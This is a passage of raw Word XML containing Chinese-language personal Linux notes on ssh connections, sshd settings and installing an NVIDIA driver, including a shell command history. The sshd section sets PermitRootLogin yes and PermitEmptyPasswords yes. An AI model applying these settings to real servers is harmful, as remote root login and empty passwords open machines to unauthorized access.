          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接到另一个主机的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sshd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BFB0BF2" w14:textId="26BE5D39" w:rsidR="00C755DA" w:rsidRDefault="00C755DA" w:rsidP="00C755DA">
      <w:r w:rsidRPr="00C755DA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh -l </w:t>
      </w:r>
      <w:r w:rsidRPr="00C755DA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>主机名</w:t>
      </w:r>
      <w:r w:rsidRPr="00C755DA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75EDDBE7" w14:textId="68939E2A" w:rsidR="00C755DA" w:rsidRDefault="00C755DA" w:rsidP="00C755DA">
      <w:r w:rsidRPr="00C755DA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh </w:t>
      </w:r>
      <w:r w:rsidRPr="00C755DA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户名</w:t>
      </w:r>
      <w:r w:rsidRPr="00C755DA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>@</w:t>
      </w:r>
      <w:r w:rsidRPr="00C755DA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21CF2C34" w14:textId="689CA63E" w:rsidR="00C755DA" w:rsidRDefault="00C755DA" w:rsidP="00C755DA">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C755DA">
        <w:t>ssh pika@192.168.0.111</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267A6B84" w14:textId="25273C7C" w:rsidR="00C755DA" w:rsidRDefault="00C755DA" w:rsidP="00C755DA">
      <w:r w:rsidRPr="00C755DA">
        <w:t>ssh username@remote_host -p 2222</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A78459" w14:textId="77777777" w:rsidR="00C755DA" w:rsidRDefault="00C755DA" w:rsidP="00C755DA"/>
    <w:p w14:paraId="7FB9E0C7" w14:textId="342AAC90" w:rsidR="00C755DA" w:rsidRDefault="00C755DA" w:rsidP="00C755DA">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过密钥连接</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64CC0A88" w14:textId="16A2FE72" w:rsidR="00C755DA" w:rsidRDefault="00C755DA" w:rsidP="00C755DA">
      <w:r w:rsidRPr="00C755DA">
        <w:t>ssh -i path/to/key_file username@remote_host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C772E4" w14:textId="77777777" w:rsidR="00C755DA" w:rsidRDefault="00C755DA" w:rsidP="00C755DA"/>
    <w:p w14:paraId="2BC75560" w14:textId="62670753" w:rsidR="00C755DA" w:rsidRDefault="00C755DA" w:rsidP="00C755DA">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过跳板机连接</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC1FEB8" w14:textId="52502B99" w:rsidR="00C755DA" w:rsidRDefault="00C755DA" w:rsidP="00C755DA">
      <w:r w:rsidRPr="00C755DA">
        <w:t>ssh -J username@jump_host username@remote_host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429188C2" w14:textId="77777777" w:rsidR="00C755DA" w:rsidRDefault="00C755DA" w:rsidP="00C755DA"/>
    <w:p w14:paraId="20130A08" w14:textId="77777777" w:rsidR="00C755DA" w:rsidRPr="00C755DA" w:rsidRDefault="00C755DA" w:rsidP="00C755DA"/>
    <w:p w14:paraId="0A59AB3B" w14:textId="77777777" w:rsidR="00C755DA" w:rsidRDefault="00C755DA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FAB6A64" w14:textId="474D0D94" w:rsidR="00ED2FA8" w:rsidRDefault="00ED2FA8" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="204" w:name="_Toc159779664"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>shd</w:t>
      </w:r>
      <w:bookmarkEnd w:id="204"/>
    </w:p>
    <w:p w14:paraId="22137023" w14:textId="77777777" w:rsidR="00ED2FA8" w:rsidRDefault="00ED2FA8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49325889" w14:textId="3915ECF2" w:rsidR="00ED2FA8" w:rsidRDefault="00BE3D52" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="205" w:name="_Toc159779665"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>允许</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户远程登录</w:t>
      </w:r>
      <w:bookmarkEnd w:id="205"/>
    </w:p>
    <w:p w14:paraId="3806B1E0" w14:textId="4DAC6974" w:rsidR="00ED2FA8" w:rsidRDefault="001C35CB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="001C35CB">
        <w:t>vi /etc/ssh/sshd_config</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E675C5A" w14:textId="125A6D21" w:rsidR="00BE3D52" w:rsidRDefault="001C35CB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="001C35CB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调整</w:t>
      </w:r>
      <w:r w:rsidRPr="001C35CB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PermitRootLogin</w:t>
      </w:r>
      <w:r w:rsidRPr="001C35CB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数值为</w:t>
      </w:r>
      <w:r w:rsidRPr="001C35CB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>yes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A738284" w14:textId="500832E6" w:rsidR="00BE3D52" w:rsidRDefault="00CF6EE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（默认是</w:t>
      </w:r>
      <w:r w:rsidRPr="001C35CB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PermitRootLogin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Per</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">habit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>什么的，改成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>yes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0C13D9" w14:textId="77777777" w:rsidR="00CF6EE8" w:rsidRDefault="00CF6EE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E6EF4A5" w14:textId="1E591C38" w:rsidR="003A64D1" w:rsidRDefault="003A64D1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重启</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务</w:t>
      </w:r>
      <w:r w:rsidR="00E96435">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1644310F" w14:textId="0CB8A588" w:rsidR="00E96435" w:rsidRDefault="00E96435" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00E96435">
        <w:t>service sshd restart</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BD8C32" w14:textId="77777777" w:rsidR="003A64D1" w:rsidRPr="00ED2FA8" w:rsidRDefault="003A64D1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48269BAC" w14:textId="500D5D65" w:rsidR="00ED2FA8" w:rsidRDefault="00413752" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="206" w:name="_Toc159779666"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>允许无密码登录</w:t>
      </w:r>
      <w:bookmarkEnd w:id="206"/>
    </w:p>
    <w:p w14:paraId="13B4ECEF" w14:textId="77777777" w:rsidR="00413752" w:rsidRDefault="00413752" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4172B1F2" w14:textId="68402153" w:rsidR="00EE3960" w:rsidRDefault="00EE3960" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务配置文件，两种情况：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D2A23E" w14:textId="44A42584" w:rsidR="00EE3960" w:rsidRDefault="00EE3960" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PermitEmptyPasswords yes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>前面的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>号去掉</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DADFD40" w14:textId="7FA6FF7C" w:rsidR="00413752" w:rsidRPr="00413752" w:rsidRDefault="00EE3960" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">PermitEmptyPasswords </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数值修改为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>yes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，如下图：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5829962F" w14:textId="77777777" w:rsidR="00A35D1F" w:rsidRDefault="00A35D1F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D3B160B" w14:textId="51AABE73" w:rsidR="003A64D1" w:rsidRDefault="003A64D1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重启</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务</w:t>
      </w:r>
      <w:r w:rsidR="00E96435">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5B17ED" w14:textId="26BD9285" w:rsidR="00ED2FA8" w:rsidRPr="003A64D1" w:rsidRDefault="00E96435" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00E96435">
        <w:t>service sshd restart</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14523B6F" w14:textId="77777777" w:rsidR="00ED2FA8" w:rsidRDefault="00ED2FA8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="593C0EFA" w14:textId="5C0FB355" w:rsidR="00E43D96" w:rsidRDefault="000144A0" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="207" w:name="_Toc159779667"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Nvidia</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>卡</w:t>
      </w:r>
      <w:bookmarkEnd w:id="207"/>
    </w:p>
    <w:p w14:paraId="615FB997" w14:textId="305FBD68" w:rsidR="000144A0" w:rsidRDefault="000144A0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25C4EEB1" w14:textId="53E44198" w:rsidR="00B34BE7" w:rsidRDefault="00B34BE7" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="208" w:name="_Toc159779668"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>正确</w:t>
      </w:r>
      <w:r w:rsidR="005C3175">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>情况</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后的内核查询</w:t>
      </w:r>
      <w:bookmarkEnd w:id="208"/>
    </w:p>
    <w:p w14:paraId="194F8591" w14:textId="77777777" w:rsidR="00B34BE7" w:rsidRDefault="00B34BE7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00B34BE7">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>(base) syj@syj-ubuntu:~$ lsmod| grep -i nvi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC3CFDD" w14:textId="77777777" w:rsidR="00B34BE7" w:rsidRDefault="00B34BE7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>nvidia_drm             69632  0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650A1000" w14:textId="77777777" w:rsidR="00B34BE7" w:rsidRDefault="00B34BE7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>nvidia_modeset       1212416  1 nvidia_drm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E14AB1D" w14:textId="77777777" w:rsidR="00B34BE7" w:rsidRDefault="00B34BE7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>nvidia              56340480  1 nvidia_modeset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F54C95" w14:textId="77777777" w:rsidR="00B34BE7" w:rsidRDefault="00B34BE7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>drm_kms_helper        311296  1 nvidia_drm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2287A9D3" w14:textId="77777777" w:rsidR="00B34BE7" w:rsidRDefault="00B34BE7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>drm                   622592  4 drm_kms_helper,nvidia,nvidia_drm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498AD83F" w14:textId="77777777" w:rsidR="00B34BE7" w:rsidRDefault="00B34BE7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>i2c_nvidia_gpu         16384  0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E96C57F" w14:textId="77777777" w:rsidR="00B34BE7" w:rsidRDefault="00B34BE7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00B34BE7">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>(base) syj@syj-ubuntu:~$ lsmod| grep -i gpu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29238675" w14:textId="77777777" w:rsidR="00B34BE7" w:rsidRDefault="00B34BE7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>i2c_nvidia_gpu         16384  0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FA8322" w14:textId="77777777" w:rsidR="00B34BE7" w:rsidRDefault="00B34BE7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2327E4A8" w14:textId="77777777" w:rsidR="005C3175" w:rsidRDefault="005C3175" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44F600CA" w14:textId="453539EE" w:rsidR="005C3175" w:rsidRDefault="005C3175" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="209" w:name="_Toc159779669"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不正确情况的内核查询</w:t>
      </w:r>
      <w:bookmarkEnd w:id="209"/>
    </w:p>
    <w:p w14:paraId="1E23643D" w14:textId="77777777" w:rsidR="00B34BE7" w:rsidRDefault="00B34BE7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23EC422C" w14:textId="77777777" w:rsidR="005C3175" w:rsidRDefault="005C3175" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30DAEABE" w14:textId="77777777" w:rsidR="005C3175" w:rsidRDefault="005C3175" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AA1C3BD" w14:textId="77777777" w:rsidR="005C3175" w:rsidRDefault="005C3175" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7360532D" w14:textId="77777777" w:rsidR="005C3175" w:rsidRDefault="005C3175" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F72EF17" w14:textId="77777777" w:rsidR="005C3175" w:rsidRDefault="005C3175" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A5157CF" w14:textId="77777777" w:rsidR="005C3175" w:rsidRDefault="005C3175" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="161A69E0" w14:textId="77777777" w:rsidR="00B34BE7" w:rsidRDefault="00B34BE7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E2B8014" w14:textId="1CD6CAB8" w:rsidR="00B34BE7" w:rsidRDefault="00B34BE7" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="210" w:name="_Toc159779670"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>鹏哥</w:t>
      </w:r>
      <w:r w:rsidR="0077272B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装显卡的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的命令记录</w:t>
      </w:r>
      <w:bookmarkEnd w:id="210"/>
    </w:p>
    <w:p w14:paraId="7DE5CAF6" w14:textId="77777777" w:rsidR="00B34BE7" w:rsidRDefault="00B34BE7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63F219AB" w14:textId="26DA8E58" w:rsidR="000144A0" w:rsidRDefault="00306D1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00306D1A">
        <w:t>./NVIDIA-Linux-x86_64-525.89.02.run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C920F30" w14:textId="77777777" w:rsidR="000144A0" w:rsidRPr="000144A0" w:rsidRDefault="000144A0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="004C7710" w14:textId="77777777" w:rsidR="00306D1A" w:rsidRDefault="00306D1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>apt list | grep nouveau</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10804156" w14:textId="77777777" w:rsidR="00306D1A" w:rsidRDefault="00306D1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   44  apt list | grep installed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23572D47" w14:textId="77777777" w:rsidR="00306D1A" w:rsidRDefault="00306D1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   45  apt list | grep installed |grep nvidia</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6270C501" w14:textId="77777777" w:rsidR="00306D1A" w:rsidRDefault="00306D1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   46  apt list | grep installed |grep nouveau</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B429CF8" w14:textId="77777777" w:rsidR="00306D1A" w:rsidRDefault="00306D1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   47  apt search nvidia</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658C9542" w14:textId="77777777" w:rsidR="00306D1A" w:rsidRDefault="00306D1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   48  apt search nvidia | grep installed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D46E389" w14:textId="77777777" w:rsidR="00306D1A" w:rsidRDefault="00306D1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   49  apt purge ubuntu-drivers-common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0393E174" w14:textId="77777777" w:rsidR="00306D1A" w:rsidRDefault="00306D1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   50  ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3CDB15" w14:textId="77777777" w:rsidR="00306D1A" w:rsidRDefault="00306D1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   51  ./NVIDIA-Linux-x86_64-525.89.02.run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48AD9A75" w14:textId="77777777" w:rsidR="00306D1A" w:rsidRDefault="00306D1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   52  rmmod nouveau</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470B4E93" w14:textId="77777777" w:rsidR="00306D1A" w:rsidRDefault="00306D1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   53  ./NVIDIA-Linux-x86_64-525.89.02.run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D22F9A" w14:textId="77777777" w:rsidR="00306D1A" w:rsidRDefault="00306D1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   54  nvidia-smi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7578E462" w14:textId="77777777" w:rsidR="00306D1A" w:rsidRDefault="00306D1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   55  modprobe nvidia</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39DE81B5" w14:textId="77777777" w:rsidR="00306D1A" w:rsidRDefault="00306D1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
